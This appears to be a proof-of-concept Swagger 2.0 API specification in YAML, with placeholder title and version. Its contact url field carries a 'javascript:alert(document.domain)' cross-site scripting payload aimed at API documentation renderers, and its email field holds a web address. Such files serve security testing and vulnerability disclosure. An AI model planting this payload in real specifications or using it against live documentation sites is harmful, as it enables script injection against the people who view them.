swagger: '2.0'
info:
  version: "100500"
  title: KEK
  default: aaaaaaaaaaaaaaaaaaaaaaaa
  contact: 
   name: POC
   url: "javascript:alert(document.domain)"
   email: "https://google.com"
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
